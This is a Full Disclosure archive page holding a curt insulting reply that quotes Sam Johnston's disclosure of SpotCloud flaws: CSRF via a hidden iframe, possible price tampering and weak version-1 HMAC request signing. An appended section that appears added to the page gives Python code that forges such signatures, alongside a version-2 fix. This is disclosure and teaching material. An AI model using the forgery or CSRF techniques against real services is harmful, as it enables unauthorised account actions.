Full Disclosure mailing list archives
Re: SploitCloud: exploiting cloud brokers for fun and profit
From: xD 0x41 <secn3t () gmail com>
Date: Fri, 11 Nov 2011 06:22:09 +1100
Lame. Sorry, but it just is. You're a lamer, dude. I'll make sure to blog this for you.

On 10 November 2011 06:25, Sam Johnston <samj () samj net> wrote:
Apologies for the HTML — too many inline links. Sam

SploitCloud: exploiting cloud brokers for fun and profit <http://samj.net/2011/10/sploitcloud.html>

My friends at Enomaly <http://www.enomaly.com/> have been beating up on Amazon Web Services (AWS) <http://aws.amazon.com/> (<http://twitter.com/#%21/ruv/status/129928434079109121>, <http://twitter.com/#%21/ruv/status/129929111526318081>, <http://twitter.com/#%21/ruv/status/129934534870446080>) over the XML signature element wrapping vulnerability <http://dl.acm.org/citation.cfm?id=1103026> currently being overhyped by the press (<http://www.theregister.co.uk/2011/10/27/cloud_security/>, <http://www.fiercecio.com/techwatch/story/security-flaw-cloud-architectures-including-amazon-web-services/2011-10-28>, <http://www.pcworld.com/businesscenter/article/242598/researchers_demo_cloud_security_issue_with_amazon_aws_attack.html>, <http://www.networkworld.com/news/2011/102611-security-cloud-252406.html>), which is ironic given their security track record (<http://www.securityfocus.com/archive/1/archive/1/500573/100/0/threaded>, <http://www.securityfocus.com/archive/1/500989>) and unfortunate given I rather like what Amazon have achieved.
Back in March I reported multiple vulnerabilities <https://groups.google.com/group/spotcloudbuyers/browse_thread/thread/1993b3ab1643bfa2> in SpotCloud <http://www.spotcloud.com/> (including their having copied Amazon's vulnerable signatures <http://www.daemonology.net/blog/2008-12-18-AWS-signature-version-1-is-insecure.html> years after they were reported and fixed <http://www.jamesmurty.com/2008/12/31/aws-query-signature-version-2/>) and I was told I was unethical <https://groups.google.com/group/spotcloudbuyers/msg/237ffac277ea8bbe> and my report that they "*may not validate incoming web and/or API requests and if so, may be vulnerable to cross-site request forgery in which an attacker could make unauthorised management requests on behalf of a user*" was "unactionably vague" <https://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95>.

To demonstrate the severity of the outstanding vulnerability go grab yourself a SpotCloud account <https://spotcloud.appspot.com/buyer/register>, charge it up <https://spotcloud.appspot.com/buyer/balance/topup> (ignoring PCI-DSS <http://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard> for a second given they're collecting credit card numbers via App Engine) and click the image below. I'll silently create an instance for you using a hidden IFRAME, but you're welcome to experiment with more destructive experiments like deleting existing instances and uploading malicious workloads.

*Update:* If you look at the code you'll see the hourly rate is passed to the client as "*cost*" and presumably trusted on return (if not, why is it there?). I haven't seen a price manipulation vulnerability <http://www.symantec.com/connect/articles/common-security-vulnerabilities-e-commerce-systems> in over a decade, but I'm not tinkering with it because I don't fancy being accused of stealing from them or their providers.
*Update:* While the consumer API <http://dl.enomaly.com/scbuyerapi> now uses OAuth, the provider API <http://dl.enomaly.com/scprovider> still uses Amazon's vulnerable signatures <http://www.daemonology.net/blog/2008-12-18-AWS-signature-version-1-is-insecure.html> for authentication:

    import hmac
    from hashlib import sha1 as sha  # the original snippet used the old 'sha' module

    # example request, reconstructed from the "Data is now:" comment below
    parameters = {'ecp_username': 'spotcloudusername',
                  'paramA': 'value',
                  'Timestamp': '2006-12-08T07:48:03Z'}

    # sorts by key.lowercase(). ie A b c Dee e ffFf
    sorted_keys = sorted(parameters.keys(), key=lambda k: k.lower())
    # concatenates key,value pairs. a=1,b=2,C=32 becomes "a1b2C32"
    data = ''.join(key + parameters[key] for key in sorted_keys)
    # Data is now: ecp_usernamespotcloudusernameparamAvalueTimestamp2006-12-08T07:48:03Z
    digest = hmac.new('spotcloudpassword', data, sha).digest()

This may have been safe over SSL were it not for the fact that client libraries (including python) typically don't validate the certificate chain by default.

*Update:* Wells Fargo reports "CHECK CRD PURCHASE SPOT CLOUD ETOBICOKE CD" as "Unusual Activity" in emailed alert… canceling card, requesting re-issue. Should have used a virtual card. Wonder if Google know their App Engine poster child <http://googleappengine.blogspot.com/2011/03/enomaly-chooses-google-app-engine-for.html> is using it to collect credit card details?

*Update:* It is believed that Private SpotCloud <http://spotcloud.com/Private.50.0.html> and Enomaly Elastic Computing Platform (ECP) <http://www.enomaly.com/Product-Overview.419.0.html> are also vulnerable to cross-site request forgery <http://en.wikipedia.org/wiki/Cross-site_request_forgery>, but without access to the software I have no way to verify.

*Update:* This is how Enomaly deals with security researchers: <http://4.bp.blogspot.com/-XwLZ56N2Gjg/TrnalAPJ9qI/AAAAAAAAAYU/SY57-4azetI/s1600/spotcloud-suspended.png>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
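The signature weakness Sam quotes above (version-1 style signing: keys sorted case-insensitively, key and value concatenated with no separator, then HMAC-SHA1) is worth seeing end to end. The following is an added example written for this archive page; it is not code from Sam's post, from Enomaly's API documentation, or from Amazon. The shared secret, the request parameters (which borrow the parameter names from the quoted comment) and the simplified version-2 canonicalisation (query-string part only, without the HTTP method, host and path that the real scheme prefixes) are all assumptions made for the demonstration. It shows that a legitimately signed request can be rewritten into a different request carrying the same signature, and that percent-encoding the pairs and separating them with `=` and `&` removes the ambiguity.

```python
import hmac
from hashlib import sha1
from urllib.parse import quote

# Constructed shared secret for the demonstration; it stands in for the
# 'spotcloudpassword' that appears in the quoted snippet.
SECRET = b"example-shared-secret"


def v1_string_to_sign(parameters):
    """Version-1 style canonicalisation as described in the post: sort the keys
    case-insensitively, then concatenate key and value with no separator."""
    sorted_keys = sorted(parameters, key=lambda k: k.lower())
    return "".join(key + parameters[key] for key in sorted_keys)


def sign_v1(parameters, secret=SECRET):
    return hmac.new(secret, v1_string_to_sign(parameters).encode(), sha1).hexdigest()


def verify_v1(parameters, signature, secret=SECRET):
    return hmac.compare_digest(sign_v1(parameters, secret), signature)


def forge_v1(parameters, index=0):
    """Turn a signed v1 request into a different request with the same signature.

    Nothing separates a key from its value or one pair from the next, so the
    boundary between two neighbouring pairs can be moved: the next key and its
    value are swallowed into the preceding value and the next key disappears.
    The concatenated string, and therefore the HMAC, does not change."""
    sorted_keys = sorted(parameters, key=lambda k: k.lower())
    keep, drop = sorted_keys[index], sorted_keys[index + 1]
    forged = dict(parameters)
    forged[keep] = parameters[keep] + drop + parameters[drop]
    del forged[drop]
    return forged


def v2_string_to_sign(parameters):
    """Simplified version-2 style canonicalisation (assumed here; the real scheme
    also prefixes method, host and path): percent-encode each key and value,
    sort byte-wise, join as key=value pairs with '&'. The encoding makes every
    boundary unambiguous, so distinct parameter sets cannot collide."""
    return "&".join(
        f"{quote(k, safe='-_.~')}={quote(v, safe='-_.~')}"
        for k, v in sorted(parameters.items())
    )


def sign_v2(parameters, secret=SECRET):
    return hmac.new(secret, v2_string_to_sign(parameters).encode(), sha1).hexdigest()


def verify_v2(parameters, signature, secret=SECRET):
    return hmac.compare_digest(sign_v2(parameters, secret), signature)


# Constructed request; parameter names follow the comment in the quoted snippet.
LEGIT = {
    "ecp_username": "spotclouduser",
    "Action": "DescribeInstances",
    "Timestamp": "2006-12-08T07:48:03Z",
}

# Merge the 2nd and 3rd keys in case-insensitive order (ecp_username, Timestamp).
# The forged request carries no Timestamp at all, yet the v1 signature still
# verifies, so any replay window built on Timestamp is gone.
FORGED = forge_v1(LEGIT, index=1)

if __name__ == "__main__":
    sig = sign_v1(LEGIT)
    print("v1 string to sign:", v1_string_to_sign(LEGIT))
    print("forged request:   ", FORGED)
    print("v1 accepts forged:", verify_v1(FORGED, sig))
    print("v2 accepts forged:", verify_v2(FORGED, sign_v2(LEGIT)))
```

The forgery needs no knowledge of the secret: the attacker only needs one signed request, which is exactly what an on-path observer gets when the client does not validate the server certificate. The v2 style fix works because `=` and `&` can no longer appear unencoded inside a key or value, so the canonical string parses back to exactly one parameter set.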
Current thread:
- SploitCloud: exploiting cloud brokers for fun and profit Sam Johnston (Nov 10)
- Re: SploitCloud: exploiting cloud brokers for fun and profit coderman (Nov 10)
- Re: SploitCloud: exploiting cloud brokers for fun and profit Jeffrey Walton (Nov 10)
- Re: SploitCloud: exploiting cloud brokers for fun and profit xD 0x41 (Nov 10)